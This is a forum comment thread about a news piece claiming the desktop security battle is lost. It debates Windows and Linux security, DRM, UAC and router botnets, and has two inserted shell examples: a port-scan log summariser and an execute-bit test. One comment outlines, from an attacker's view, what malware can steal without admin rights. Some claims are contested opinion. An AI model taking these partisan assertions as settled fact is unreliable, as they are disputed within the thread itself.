The Desktop Security Battle May Be Lost
Trailrunner7 writes in with a Threatpost.com article that begins: "For years, security experts, analysts and even users have been lamenting the state of desktop security. Viruses, spam, Trojans and rootkits have added up to create an ugly picture. But, the good news is that the desktop security battle may be over. The less-than-good news, however, is that we may have lost it. Jeremiah Grossman, CTO of WhiteHat Security, said Thursday that many organizations, particularly in the financial services industry, have gotten to the point of assuming that their customers' desktops are compromised. And moving forward from that assumption, things don't get much prettier." It goes on to speculate about home routers being targeted and infected.
No, you must have hope! We just need to hold them off a little longer until Gandalf the White Hat shows up on Shadowfax Machine.
My work here is dung.
... fall into the sea, eventually.
That was a great piece of investigative journalism. Banks have accepted that all their customers are infected and gawd knows that every last home router is insecure. So not only are you infected but you don't even know it. Run for the hills.
Does anyone remember WinNuke and 95, 98.a? Since then it's been a joyride, cDc with Back Orifice. There will always be methodologies to penetrate microcomputers as long as an incentive exists. The only way to win this 'battle' is to remove the user from the equation; we all know this won't be happening... so live ignorantly and make do with your computer in some state of fault. Happy surfing!
Of all the things I've lost; I miss my mind the most. - Mark Twain
Then they could just assume that the customer's computer is incompatible.
They'll just use it as an excuse to sell 'identity theft' insurance and dump more liability onto the customer. Their security isn't much better. PCI specs aren't nearly good enough and even if they were it wouldn't matter considering the way they handle data security. Using regular post to send CDs of customer records unencrypted, laptops lost and data breaches. Chip and Pin is a joke. Contactless transactions are worse.
They really don't care as long as it doesn't cost them much and they can dump most of the liability onto us.
The Year of Linux on the Desktop(tm) is just around the corner!
Of course we lost it.
If it is a truism that DRM is futile because it will always be defeated, then it is also a truism that Security is futile because it will always be defeated.
There are things you can do to "keep the honest people honest", but there is little you can do against those who are determined to do bad things.
A work that expires before its copyright never enters the public domain and thus enjoys eternal copyright protection.
> ...many organizations, particularly in the financial services industry,
> have gotten to the point of assuming that their customers' desktops are
> compromised.
They should have been assuming that all along. They should assume it even if only a tiny fraction of their customers' desktops are compromised.
Warning: this article may contain humor, sarcasm, parody, and perhaps even irony. Read at your own risk.
of this alarmist drivel is that there are only 2 ads on the poster's page.
-Rick
"Most people in the U.S. wouldn't know they live in a tyrannical state if it walked up and grabbed their junk." - MyFirs
Your bank uses activex?
emerge -s virus
Searching...
[ Results for search key : virus ]
[ Applications found : 0 ]
And what do condoms have to do with computer security, anyway?
(ducks for cover)
A republic cannot succeed till it contains a certain body of men imbued with the principles of justice and honour.
there is little you can do against those who are determined to do bad things.
Or against those that are determined to do stupid things, regardless of warnings and education on the dangers.
Remember to maintain your supply of
If it is a truism that DRM is futile because it will always be defeated, then it is also a truism that Security is futile because it will always be defeated.
What? No.
DRM can always be defeated because of its design. If I lend you the key to my apartment so you can go in and borrow some sugar or something, there's nothing I can do to stop you from cleaning out my apartment and skipping town. But to claim all locks are futile because of that is just retarded.
DRM can always be defeated because the "attacker" is exactly the same as the user, and you're already giving them everything they need. That is a system which is fundamentally flawed. Real security is where you don't give the attacker your keys, passwords, etc.
It is theoretically possible to build a completely secure system, from a technological standpoint. The vulnerabilities are either physical weaknesses (you could just run off with my laptop) or people. There are also vulnerabilities from sloppy coding, but these have very little effect against users with good security habits.
Sure, it may never happen, but if so, that's because we'll always make mistakes. A completely secure DRM scheme is actually a logical impossibility, even if no one makes any mistakes.
Don't thank God, thank a doctor!
Don't use Windows. Was that so hard?
I am not saying that all other operating systems are perfectly secure by default or that they are invulnerable, but windows is absolutely insecure. We have to face that truth.
Microsoft's security record is laughable. And I'm not even talking about particular exploits, bugs can be fixed, I am talking about design. Windows is designed to be insecure. Security was never really taken seriously at Microsoft. There are countless techniques to escalate permissions on just about any Win platform (including Windows Vista and 7). And these are not obscure and complex vulnerabilities. These are simple 50-line executables that allow you to escalate any process you want with a few clicks.
Just take a look at any of their products, either server or desktop, and their security record will be worse than any competitor. Exchange, SQL, IIS, Explorer, Windows, Office. They allow script execution in crazy places (like a simple text document or spreadsheet).
Windows is insecure for a very good reason: because there is a huge industry that developed around fixing Windows, that industry is so big that it has become the main tool of customer loyalty that Microsoft has. Millions, from huge antivirus companies, to overstuffed IT departments, to your average computer repairman, base their economy on Windows flaws. Those guys love Windows and all its flaws. I've actually had people telling me "Well, I know it's a piece of crap, but it's what keeps people coming to my shop again and again". Not to mention the computer retailers. Imagine the fall in Dell stock if people didn't have to buy a new computer every 2 years just to run the latest OS? A friend of mine has an iMac from 2001 running the latest OSX. And it runs amazingly well ... If people knew they can run a blazingly fast 3D desktop on an 80 dollar Atom-based mother+processor combo, Newegg would die.
So, no, we didn't lose the security battle, Microsoft won the marketing one.
WTF am I doing replying to an AC at 5 A.M on a Friday night?
No, I think you misunderstand. DRM is literally futile, in that unless you're playing something on a black box to which you have no access beyond basic input, it will be possible to break it. There is literally no way to do what they want to achieve.
Security is technically possible, and isn't really that hard to achieve on a simple level. The difficulty comes in with the added complexity needed to make systems more usable. It's ridiculously difficult, but when a system is built properly and accompanied with user training and users that know what they're doing, you can get pretty damn secure.
DRM is futile because customers need to have the 'secret' deciding key inside their machine to see the content. Combine this with a PC where you can look into the RAM and mess with it and you've got fail with a capital F.
Security isn't a product, it's a process. The problem isn't the security it's getting ordinary people to follow the process.
No sig today...
The fundamental security model of Linux is no better than that of Windows. The main reason Windows gets nailed is that it's more profitable to write malware for Windows than for anything else. If Linux had the market share of Windows, it would have as much, or nearly as much, malware.
In either Linux or Windows, being able to run any code at all gives you essentially complete access to the user's data, plus almost unlimited access to system resources, plus the ability to talk to the network. Who cares if you're not running as root if everything interesting is owned by the user's account?
There are ways to make systems more secure, starting with strong containment. How strong? Strong enough that your program can't even express the desire to, say, open a file that the user hasn't given it a capability for. Strong enough that the user has to jump through hoops to give certain programs access to certain data. Especially programs with network access... which need to be only the programs that actually need it. Strong enough to subdivide lots of functions that people are used to putting together in the same process. Strong enough that you can forget about most of the APIs you're used to coding with. And, if you're going to run apps out on the network, that whole system has to extend out into the network as well.
On top of that, people ought to be using tools that make it a lot harder to express common security bugs, and that help you to notice when you've created others.
If this is to be fixed, users and programmers are going to have to change the ways they do things. I'm not super optimistic.
Linux helps not at all. Even OpenBSD wouldn't help much.
We need to assign responsibility to those who can do something about it.
Every day, my firewall emails me a list of port scans against it, sorted by IP address. Most days that list is just under 100 different IP addresses scanning me, some days it is in the thousands of IP addresses - from all over the Internet (i.e. not just local addresses). This is on a residential DSL connection that offers no services to the world, isn't linked to by any web sites, and does not respond to any unsolicited traffic.
It seems reasonable to assume that most if not all of those IP addresses represent infected machines. Were there some way to get them shut down, imagine how much cleaner the Internet would be. However, there IS no way to do so: the ISPs hosting those machines don't provide any meaningful or automated way to report them, there is no way to contact the owner of those machines, so they just keep on spewing and infecting the rest of the system.
Nor will ISPs ever provide an automated way of reporting such machines as things stand now: a reporting mechanism is an internalized cost, and there is no reason for an ISP to internalize that cost when they can externalize it to the rest of the Internet.
This is one of those rare cases where "there ought to be a law" is a reasonable response: were ISPs required by law to investigate abuse reports and disconnect infected clients until those clients are cleaned up, the number of infected machines on the Internet would be reduced, the profit margins of the bot-herders and spammers wiped out, and the system would clean itself up. However, such a law would be fought most vigorously by all ISPs precisely because it would be internalizing a currently externalized cost, and it would be worth vastly more to ISPs to prevent such a law than the cost of lobbying against it.
(NB: "repeatedly submitting false abuse reports" is itself abuse, and should also result in the source of the false reports being shut down).
"Trojan/Worm/Virus" credits, anyone?
www.eFax.com are spammers
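The daily "port scans sorted by IP address" summary the comment above describes, as an added example that is not part of the original thread: an awk filter over constructed iptables-style log lines that counts distinct destination ports per source address and reports sources probing at least a threshold of ports. The threshold, the field names, the function names and the sample lines are my own assumptions.

```shell
#!/bin/sh
# Added example (not from the original comment): summarise firewall DROP
# lines into a per-source port-scan report. A source that probes at least
# PORT_THRESHOLD distinct destination ports is reported as a scanner.
set -u

PORT_THRESHOLD=${PORT_THRESHOLD:-3}

# Constructed sample log lines in iptables LOG format (not real traffic;
# all addresses are from documentation ranges).
SAMPLE_LOG='Apr  2 03:14:01 gw kernel: DROP IN=ppp0 SRC=198.51.100.7 DST=203.0.113.5 PROTO=TCP SPT=5553 DPT=22
Apr  2 03:14:02 gw kernel: DROP IN=ppp0 SRC=198.51.100.7 DST=203.0.113.5 PROTO=TCP SPT=5554 DPT=23
Apr  2 03:14:03 gw kernel: DROP IN=ppp0 SRC=198.51.100.7 DST=203.0.113.5 PROTO=TCP SPT=5555 DPT=445
Apr  2 03:14:03 gw kernel: DROP IN=ppp0 SRC=198.51.100.7 DST=203.0.113.5 PROTO=TCP SPT=5556 DPT=445
Apr  2 03:20:11 gw kernel: DROP IN=ppp0 SRC=192.0.2.44 DST=203.0.113.5 PROTO=TCP SPT=40001 DPT=3389
Apr  2 03:21:11 gw kernel: DROP IN=ppp0 SRC=192.0.2.44 DST=203.0.113.5 PROTO=TCP SPT=40002 DPT=3389
Apr  2 04:05:00 gw kernel: DROP IN=ppp0 SRC=203.0.113.9 DST=203.0.113.5 PROTO=UDP SPT=53 DPT=1024
Apr  2 04:05:01 gw kernel: DROP IN=ppp0 SRC=203.0.113.9 DST=203.0.113.5 PROTO=UDP SPT=53 DPT=1025
Apr  2 04:05:02 gw kernel: DROP IN=ppp0 SRC=203.0.113.9 DST=203.0.113.5 PROTO=UDP SPT=53 DPT=1026
Apr  2 04:05:03 gw kernel: DROP IN=ppp0 SRC=203.0.113.9 DST=203.0.113.5 PROTO=UDP SPT=53 DPT=1027'

# Reads log lines on stdin. For every source at or above the threshold,
# prints "SRC distinct_ports total_hits", sorted by address octet by octet
# (the "sorted by IP address" list from the comment).
scan_report() {
    awk -v thr="$PORT_THRESHOLD" '
        {
            src = ""; dpt = ""
            for (i = 1; i <= NF; i++) {
                if ($i ~ /^SRC=/) src = substr($i, 5)
                if ($i ~ /^DPT=/) dpt = substr($i, 5)
            }
            if (src == "" || dpt == "") next      # not a firewall line
            hits[src]++
            if (!((src, dpt) in seen)) { seen[src, dpt] = 1; ports[src]++ }
        }
        END {
            for (s in hits)
                if (ports[s] >= thr) print s, ports[s], hits[s]
        }' | sort -t . -k1,1n -k2,2n -k3,3n -k4,4n
}

# The report for the embedded sample.
sample_report() { printf '%s\n' "$SAMPLE_LOG" | scan_report; }

# How many sources were flagged as scanners.
count_scanners() { sample_report | wc -l | tr -d ' '; }

# How many different addresses hit the firewall at all (the headline
# figure the comment quotes), regardless of the threshold.
distinct_sources() {
    printf '%s\n' "$SAMPLE_LOG" \
        | awk '{ for (i = 1; i <= NF; i++) if ($i ~ /^SRC=/) print substr($i, 5) }' \
        | sort -u | wc -l | tr -d ' '
}

sample_report
```

A single source hammering one port (192.0.2.44 above) stays out of the scan report but still counts in `distinct_sources`; raise `PORT_THRESHOLD` on a noisier link.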
I disagree. Even working at a university, it completely depends on how you run your show. The department I'm part of has a border firewall, client firewalls, no one runs as administrator, antivirus, spyware, malware checkers are run on a regular basis. More important than any of those: we spend time to educate our users on security. They know what to avoid in terms of phishing scams, never to give out passwords to anyone, what to look for before you click on a link in an email (or even a website), etc.
To say the desktop war has been lost because the company you talked to has sucky IT and suckier IT clients...is just dumb.
It's simply a matter of convenience. There are several ways to make online banking completely secure. For instance, the bank could distribute Live CDs/USBs with a bare linux system and a browser. You want online banking? Wait for a minute or two, then login through the browser presented. Problem is, no one would put up with such inconvenience. WE WANT ACCESS RIGHT NOW!!!! Waiting for two minutes is unthinkable... Ultimately, you're right - as long as there are users, there will always be security problems, although the solution is 2 minutes away. We are just so fucking impatient :)
you are quite a jokester, sir.
The differences in how to gain administrator access do affect up front security requirements.
It's not about profit, it's that windows gives people administrator by default (and you can still enable it in Windows 7).
iexplore.exe is asking for administrator access. grant forever/don't ask again? Way to go, giving viruses admin access. It happens all the time.
The rest of the security is no different in most scenarios whether windows or linux. However, on this front, UAC doesn't do squat (especially when you can get around UAC).
I hope that was a joke. Terrible analogy. Let's think for a moment what would happen if we dropped all security measures in place today. I mean all (drop all firewalls, disable all spam filters, anti-virus, encryption, etc.). The Internet would collapse in a matter of seconds. Emails becoming completely unusable, the remaining PCs infected, servers rooted, websites defaced... Now imagine what would happen if we suddenly dropped all DRM schemes. Nothing.
This sort of FUD is in the best interest of those who sell "Identity guard" style products/subscriptions.
-- if you mod me down, I will become more powerful than you can possibly imagine
The practice of using a single privileged account for everything - banking, reading Slashdot, downloading porn - may be doomed, and about time too. But I still think there's hope for using a single piece of hardware and a single network. Even if it comes down to using not just separate accounts, but separate cores, for play and work. Last time I looked (a while back) some CPU manufacturers were adding features for process separation but the OS had not yet implemented support. End-to-end encryption should protect your data in transit, if not your usage pattern, though there are a few things to fix in SSL implementations to prevent MITM.
I agree with you, but I think a better analogy to PC security is hiring a chauffeur to drive your car. Suppose you tell him to drive to a bad part of town so you can check out the russian porn sites, but don't lock your doors. While you're away somebody opens the car, clubs Jeeves over the back of the head, steals his uniform and pretends to be him. When you get back to the car, you sit in the back seat and tell him where to go and don't really pay attention to the fact that now he has a mustache and speaks only Nigerian.
If you'd had locks on your car (and if you'd avoided the bad parts of town) then you'd be ok. However, because you went to foolish places and didn't take precautions, it's no surprise that next time you tell Jeeves to take you to the bank, you get taken for a ride in more ways than one.
Scientists point out problems, engineers fix them
altslashdot.org: The future of slashdot.
You mean, in our tidy little world of 1s and 0s, where bugs don't exist, computers work perfectly, just like how Hollywood portrays them? Time to come to grips with reality. The World Isn't Perfect (tm), film at 11. People will continue to get pwned on their computers, just like how convenience stores will continue to get robbed, and how funds will be embezzled, and assets seized by a coup, and on and on.
body massage!
I know that it's a sacred tradition to regurgitate fanboy oneliners without thinking, but in this case
1. it was even in the summary that by now even home routers are targeted by the asshats. I fail to see how a hardened Linux PC helps there.
2. Actually, it seems to me like most zombie PCs nowadays don't come from port overflow attacks any more, but because of users clicking on spam links, re-entering their bank password on some www.i-pwn-you.ru site (fictive address for example sake) because the email told them to, and installing crap.
I'm not sure how Linux would help there at all. You do know that you can download and install rootkits for Linux too, right? In fact even the term rootkit comes from the Unix world, not from Windows. What's to keep an asshat from making their rootkit masquerade as a cutesy Linux screensaver instead of a cutesy Windows screensaver?
If user clue remains a constant, meet the Clueless family, a white suburban family whose only knowledge of computers is that the nice guy at the shop said they need the most expensive one: you'll still have Joe Clueless opening executables he received in spam mails. And his wife Jane Clueless confirming her Paypal and eBay password the fourth time this week alone, and none of them was on paypal.com or ebay.com. And downloading and installing some piece of spyware masquerading as some cutesy utility or casual game. And their son, Timmy Clueless installing what some dodgy site told him is some hack to see through walls in Counter-Strike. And of course it needs to be installed as root, in fact as a kernel module. So punkbuster (or equivalent) can't detect it, you know? *nudge* *nudge* *wink* *wink* Know what I mean, eh?
Just as they're not deterred by Windows popping up a big fat windows asking them if they really want to install stuff, they won't be deterred by whatever hoops your favourite Linux distro makes them jump through either. If they have to su -, they'll su -.
End result: they're still pwned.
A polar bear is a cartesian bear after a coordinate transform.
I know this because I got a message saying my antivirus was out of date and that I needed to install an update. I simply clicked the link, gave them my credit card number and I'm safe now. I even have a cool new homepage.
The Kai's Semi-Updated Website Thingy
The battle isn't winnable, not without a significant world wide crackdown on rights and liberties.
Using that logic to say we shouldn't fight the battle at all is fundamentally flawed though. It's akin to saying that the battle against murder, rape and kiddie porn isn't winnable and should be given up. Human nature cannot be changed, we've spent countless thousands of years learning and relearning that lesson when we forget what history has taught us before.
Just because human nature cannot be changed does not mean that we give up on protecting ourselves. You don't play to win, you play because you can't afford to lose.
We should assume compromise when we are building security into networked systems.
Anything less would not be diligent in proactive security. And security is always best when it is proactive, and not reactive.
And while it is inconvenient and even possibly insulting to those of use who have decent control over our system(s), we shouldn't base what we do upon our own security, we should be looking towards the weakest link and assume that it does and will continue to exist, and that is a vector for attack.
Agent K: A *person* is smart. People are dumb, stupid, panicky animals, and you know it.
iexplore.exe never asks for admin access. The installer for IE updates does, as it should, but iexplore.exe never does (unless a plugin does, I suppose -- or if you're blaming an application you downloaded on IE on iexplore.exe even though it's a different process).
While your suggestion is architecturally sound, the problem is that it is either A) A gigantic pain in the ass. or B) Gives enormous power to the vendor, that they will almost certainly exploit.
In the case of Linux, "A" largely applies. A properly configured SELinux setup will give you most of what you are asking for; but those are enough of a pain to set up that very few people have them.
Quitters never win.
Winners never quit.
But those who never win and never quit
are idiots.
-- despair.com
malware writers don't care one bit about administrator/root access. All they want is computers' resources.
And on a side note, UAC is light years ahead of its Linux equivalent, gksudo, which can be easily faked by a rogue process and in combination with cached credentials (see: Ubuntu) will give up root permissions to any rogue process that wants them.
I don't always use unix-like operating systems; but when I do, I prefer FreeBSD.
Other countries seem to be realizing that it's a much more winnable battle if home users aren't in an MS environment. Isn't this EXACTLY why the Canadian bank recently started handing out Linux Live Boot CDs for their customers to use when banking from home?
I think this is the article http://linux.slashdot.org/story/10/03/25/2350236/Can-Ubuntu-Save-Online-Banking
Yes, any halfway competent organization can secure its workstations. It's not that hard to form and enforce reasonable policies that keep the receptionist's system clean.
But when she gets home, there's no organization backing her up. There is no policy or IT support beyond (maybe) some Indian call centre whose first priority is getting her off the line ASAP. It's fair to assume her desktop at home has been compromised by anyone with the inclination to do so.
Relevancy Check here.
We are interrupting the scheduled Windblows/M$ bashing documentary with the news and weather report from the land of TFA:
Botnets are starting to target and infect routers and DSL modems. Scary, and a possible trend. Think about what this could mean. Should this problem become pervasive, it won't matter if PCs are disinfected, swapped out, or replaced with iPads, the bad guys are still in control because they own the network below. They'll own DNS, the routers in between, and so on. There are effectively few defensive countermeasures to protect home routers and DSL modems, which are not exactly secure to begin with, or to detect if they've been compromised.
These are all reasonable assumptions based on real-world attacks that have been going on for some time now. Attackers have been targeting home networking equipment for a couple of years, using a combination of vulnerabilities in the firmware and hardware to get control of home users' outbound Internet traffic. It's an increasingly effective strategy for attackers looking to get control of large numbers of systems, without having to re-infect them regularly.
That was Relevancy Check with news and the weather.
Now we return you to your scheduled blind worshiping your favorite non-M$ OS and Windblows/M$ bashing documentary.
Against stupidity the gods themselves contend in vain.
Now that HP has open sourced its Polaris virus-safe computing project.
Higher Logics: where programming meets science.
You are not advocating that people stop downloading Russian porn are you? Because that is just crazy talk!
If I were God, wouldn't I protect my churches from acts of me?
So, suppose I'm the business end of a botnet.
What does administrator access give me?
Sure, I'll take if I can get it, because it might come in handy. But how important is it to me, really?
If I want to steal the user's credit card number, it's right there in a Quicken file. No admin access required.
If I want the user's contact list, it's in Outlook or whatever.
If I want to steal the user's passwords, no problem, I can still hook the keyboard one way or another, or just grab them from the browser's password store.
I may not be able to rewrite the browser, but I can debug the browser process and get the same effect.
If I want to run the webcam, no privileges are required.
If I want to send spam, I can make a TCP connection without administrator access.
OK, I may have trouble hiding myself as well as I'd like from privileged anti-malware programs, or make it monstrously hard for them to remove me. There are a few things I can't change on the local system. I probably can't hook file system or network access, and if I can it's probably for only one user. There are a few not-that-important services I can't talk to. I can't mess with the lower layers of the network very much. I can't create another user. It would be nice to be able to do those things. But it's not like I'm seriously handicapped without administrator access. And, since I also have access to run privileged programs or send requests to privileged services, I have a huge surface available to attack with 'sploits if I do want administrator access.
Same on Linux. Yeah, there are differences, but they're down in the noise; they aren't the sorts of qualitative things that would really matter in terms of making the desktop trustworthy.
Attackers have been targeting home networking equipment for a couple of years, using a combination of vulnerabilities in the firmware and hardware to get control of home users' outbound Internet traffic
So, regardless if you have Windows, Mac OS or Linux; you could be fucked.
It looks like an attacker can put code in your router's firmware that sends all your traffic through their computers and they sniff it and get your passwords to your bank accounts.
And there are other exploits.
RIP America
July 4, 1776 - September 11, 2001
We could start, by throwing the book at money mules. Anybody who's busted gets 5 years in the slammer for fraud, and paraded on the 6 o'clock news.
The failure to vigorously prosecute money mules is the big elephant in the room at the moment.
And if everyone in the world used Linux how long do you think it would be before people were sudoing Bonzi Buddy?
There's no security that can't be defeated by the end user. If they have the ability to access administrator at all then they have the power to negate everyone's hard work.
You're wrong in saying administrator access is the basic difference between Linux and Windows. The most basic difference is in default file permissions. Windows ties read and execute together by default. You put an executable on a Windows system and it's immediately executable by anyone. That is not true with Linux. Executables are only executable by default if a system tool, such as apt-get, yum, etc., is used to install them. Otherwise, the user himself must add the execute permission to the file.
This is a huge barrier to malware spreading like many instances of Windows malware have spread. Remember all those instances of one person opening an infected email and everyone in the office being infected as a result? Can't happen on Linux due to file permissions. That executable can't execute unless/until the user gives it execute permission.
Test it for yourself. Write a script on a Linux machine and try to execute it without adding execute permissions. You can't do it. Try that on Windows and it works. No changes necessary. That's a huge difference in security.
"while democracy seeks equality in liberty, socialism seeks equality in restraint and servitude." de Tocqueville
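The "test it for yourself" experiment from the comment above, as an added example that is not part of the original thread: it writes a throwaway script into a scratch directory, runs it directly before and after `chmod u+x`, and then hands the same non-executable file to `sh` to show that the execute bit governs direct execution only. Function names and the scratch-directory layout are my own.

```shell
#!/bin/sh
# Added example, not code from the thread: reproduce the execute-bit
# experiment on a throwaway script, then show where the bit stops applying.
set -u

# Write a two-line script into a scratch directory under the current
# directory (not /tmp first, since some systems mount it noexec), with
# mode rw-r--r-- so that no execute bit is set. Prints the file's path.
make_script() {
    dir=$(mktemp -d ./execbit.XXXXXX 2>/dev/null || mktemp -d) || return 1
    printf '#!/bin/sh\necho hello\n' > "$dir/hello.sh"
    chmod 644 "$dir/hello.sh"
    printf '%s\n' "$dir/hello.sh"
}

# Case 1: run the file directly without the execute bit. execve() fails
# with EACCES (even for root, which still needs at least one x bit set),
# nothing in the file runs, and the calling shell reports status 126,
# "Permission denied". Prints "blocked:126".
direct_without_x() {
    f=$(make_script) || return 1
    rc=0
    "$f" >/dev/null 2>&1 || rc=$?
    rm -rf "$(dirname "$f")"
    if [ "$rc" -eq 0 ]; then echo ran; else echo "blocked:$rc"; fi
}

# Case 2: add the execute bit first, as a package manager or the user
# would, and the same file runs. Prints "hello".
direct_with_x() {
    f=$(make_script) || return 1
    chmod u+x "$f"
    out=$("$f" 2>&1)
    rm -rf "$(dirname "$f")"
    printf '%s\n' "$out"
}

# Case 3: the limit of the execute bit. Passing the non-executable file to
# an interpreter only opens it for reading, so the kernel's execute check
# is never consulted and the script runs anyway. Prints "hello".
via_interpreter_without_x() {
    f=$(make_script) || return 1
    out=$(sh "$f" 2>&1)
    rm -rf "$(dirname "$f")"
    printf '%s\n' "$out"
}

direct_without_x
direct_with_x
via_interpreter_without_x
```

Case 3 is why the execute bit is a speed bump rather than a control: mount options such as noexec behave the same way, blocking execve() but not an interpreter reading the file.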
One thing I loved about the ThinkNIC I set up for my mom so many years ago was that it was impossible to break. It booted from read-only media (a CD) so I knew that mom could never screw up anything in her computer permanently. The worst possible crash could be fixed by just turning it off and back on.
With so many folks pushing "cloud-based" solutions for, well, everything - Why hasn't something like the ThinkNIC come back?
A little box with any sort of read-only memory could hold all the programs most users will ever want. Make that memory in the form of some sort of plug-in card, and the entire machine would be easy to upgrade. (ThinkNIC used to send out new CDs with the latest versions of their setup.) It would also be easy to fix if a security problem were found; just mail out a new SD card or whatever.
Banks could advertise "Real Security. Because we care." They could give away a small computer to customers with the promise that said little box would enable streamlined access to their accounts, all while doing nearly everything an adult could need from a computer.
There's a kernel of a good idea in there, somewhere. I'm not the entrepreneur to make it into a business but I'm wondering why I don't see anyone trying?
I never seem to have these problems. Is there some weird, vulnerable OS out there that a lot of folks are using?
there is little you can do against those who are determined to do bad things.
Or against those that are determined to do stupid things, regardless of warnings and education on the dangers.
I've always thought it would be a great idea for the state law enforcement agencies to look for e-mail addresses the same way spammers do. Then send fake phishing e-mails to those addresses. If a user responds favorably or goes to the phishing site, apply a court order requiring that the user is denied Internet access for six months. The justification is that their stupidity creates botnets and enables spam that harms many other people and reduces the overall quality of the entire network; therefore they should be held responsible for it.
While I don't normally want the government to find new ways to get involved in things, this one isn't so bad because it requires the active participation of the user. If your e-mail address is already out there, one more phishing attempt is a drop in the bucket. Other than one additional e-mail, anyone with sense enough not to respond to phishers would not be affected by this.
It is a miracle that curiosity survives formal education. - Einstein
It is theoretically possible to build a completely secure system, from a technological standpoint. The vulnerabilities are either physical weaknesses (you could just run off with my laptop) or people.
Err, that someone running off with your laptop is a "people". So is that someone who's writing malware.
"while democracy seeks equality in liberty, socialism seeks equality in restraint and servitude." de Tocqueville
Actually, it seems like a reasonable assumption to me. Always code or design assuming the worst. Before you decide what hoops you make the user jump through to get his money online, assume that he's pwned in every imaginable way, that his firewall is mis-configured to be a digital goatse ;) and probably he's not even who he says he is. And he's probably trying to break your system too. Because sooner or later you'll have to deal with just that. Now what can you do to mitigate such a situation?
Basically you can divide people and design philosophies into a spectrum between:
- optimistic: they expect the best possible outcome. They just know it'll be all right. The world is nice, the users do exactly the click sequence they've been told to, and his functions only receive exactly the right input.
- pessimistic: they expect that Murphy's Law is actually a law of the universe, and if something could possibly go wrong without violating the laws of physics, it will. Actually the real serious pessimists don't even exclude the laws of physics going wrong. They tend to have the speed of light as a variable ;) They also tend to bring a sweater or two along when going to the beach in Florida in August. And they just know that some bastard out there will feed their program the wrong input, or will have his password stolen by a keylogger and then sue when he finds his account empty. They tend to rarely be disappointed in those expectations, actually.
Personally I like my programs and processes designed by the latter. And it seems to me like this is what those banks are doing. They're for a change starting from the worst possible scenario as an assumption. Nothing wrong with that.
A polar bear is a cartesian bear after a coordinate transform.
I have SELinux on my desktop, although it's not as tightly configured as it could be. I'm typing this on it. It's not what I want, and I don't think it can be made into what I want.
The problem with SELinux is that it falls into the classic "reference monitor" trap, where some outside piece of code tries to intuit the intent of something like a system call. It's a layered-on kludge, like a firewall.
I want something more like KeyKOS or EROS, perhaps with a layer of something like (but not identical to) MLS a la Bell and LaPadula, or some kind of compartment tagging system. In SELinux, I can still say "fopen (/etc/passwd)". In KeyKOS, "/etc/passwd" isn't even a defined name for me; if I need that file, I'll be given an opaque handle for it, which I can then store in my own name space if I want to.
It is not enough to layer on some kind of reference checker if the underlying programs assume that they have access to everything. One of the big reasons that SELinux is a PITA is that the behavior of the programs it's trying to control is so complicated and irregular, and the people writing the programs aren't the people writing the SELinux configurations. Without big changes in the APIs and ways of doing things, it's really hard to guess what a program may try to do or what it needs.
SELinux also doesn't have the sort of granularity it would need for network access control. You only get control up to the socket layer. To do it right, you'd need to rearchitect the whole stack, so that you could give programs restricted access at whatever layer was appropriate. It should be possible to express "this program can get this URL (or, better yet, this opaque network handle), but not this other URL".
iexplore.exe is asking for administrator access. grant forever/don't ask again? Way to go, giving viruses admin access. It happens all the time.
That never happens because UAC does not have an option to "grant forever/don't ask again" when running a program as admin. It never has.
Don't use Windows. Was that so hard?
Heh. It's easy; I've done it myself. In fact, it's easier than using Windows, which has the most difficult UI in the industry, especially since it's constantly changing.
But that's all irrelevant, because computer security has absolutely nothing to do with sales. It's determined by ad budgets. Microsoft can spend (and has spent) over a billion US$ marketing a release of Windows. The only other computer company that can come close to this is Apple, and they're more than an order of magnitude away from it. No other "competitor" stands a chance of getting the funding that it takes to get into the market.
And, in a sense, even that is irrelevant to the topic at hand. As far as security is concerned, the 90% or so of the customers who use MS Windows don't spend money on security. It's not something they can see, and they'll never understand the technical details. Building them a secure system is more expensive than not bothering with security, and it wouldn't increase sales past the current 90%, so why should MS bother?
Perhaps the best bit of evidence here is something that came out on /. recently: the discovery that, even if you tell Windows to not update anything automatically, there are still parts of "the system" that get updated whenever MS says (and the machine is connected to the Internet). During the discussion, it came out that this "feature" has been in Windows since XP. Now, to us geeks and nerds, this is obviously a "back door" that was planted purposely with the intention that outsiders be able to install software on a machine without permission. That's what it does, after all, and such things don't get implemented by accident. It's also obvious to us that it won't be limited to only MS employees; all it takes is a bit of "social engineering" (typically in the form of a bit of cash), and info about this back door will be available to essentially anyone. This has all been acknowledged by Microsoft.
But did this produce any outrage or abandonment of MS Windows? I haven't seen or read of any. The customers don't care. Security isn't something they actually use, so it's not interesting. If you try explaining the problems with this automatic update feature, their eyes glaze over, they classify you as a computer nerd, and they switch to a topic that's actually interesting.
Actually, this is a case where the canonical auto analogy works quite well. Look at all the safety features that have been put into cars over the past decades. How many of them happened because customers were demanding them? Right; none. Safety features were all forced on the auto makers by government regulators. Customers couldn't even be persuaded to pay for seat belts; they had to be mandated by law. And then, most people refused to use them until the cops started writing tickets. In this case, it's pretty obvious that lives are quite literally at stake, yet people wouldn't pay for (or use) safety features. Safety had to be forced on them by those evil government regulators.
The situation is worse with computers. With cars, most of the safety features are visible and/or unobtrusive. With computers, most security features are either invisible or they become visible by interfering with usability. People don't pay for things they can't see, and they especially don't pay for things that interfere with what they're trying to do. The computer industry obviously doesn't know (or care) how to make security both silent and noninterfering, as the auto industry has (mostly) been able to do.
The computer industry does know a lot about security, of course. But the Market Leader that makes that 90% of delivered systems has no motive to implement good security, because it's a cost that doesn't add to their income, and they know that their customers don't care. They can invest a small amount in "security theater", and that's all they need. They can safely ignore the maybe 5% of the market that understands securit
Those who do study history are doomed to stand helplessly by while everyone else repeats it.
> And on a side note, UAC is light years ahead of it's Linux equivalent, gksudo
Yes. It's so far ahead of Linux that people GENERALLY TURN IT OFF BECAUSE IT IS SO D*AMN ANNOYING.
Yes. You're right. UAC is light years ahead of the competition when it comes to being a nuisance.
UAC is a total joke. You're an idiot for even bringing it up.
A Pirate and a Puritan look the same on a balance sheet.
No, it's about profit. The flaw in the Windows/Linux/OSX security model isn't administrator access. Having a concept of some split personality user is a ridiculous hack that dates from a security architecture designed in the 70s. Nobody would use it if designing an OS from scratch today.
The flaw in these systems' models is that developer tools and debuggers specifically are not built in to the system but rather are treated the same as any other application, which means any app can take control of any other app with only an "are you sure" screen in between at best.
You'll notice that mobile OSes don't have this. ChromeOS will likely have the standard Chrome developer tools which are "special" and cannot simply be swapped out for some other app. This means less innovation in debuggers but it gives the possibility of implementing real security because apps become much less slippery.
The desktop PC era is coming to a close. Nobody is quite sure what'll come next but I'm putting my cards on a combination of some much improved iPad OS, Android or (more likely) ChromeOS. Right now these are the only contenders for the "usefully more secure than windows" crown.
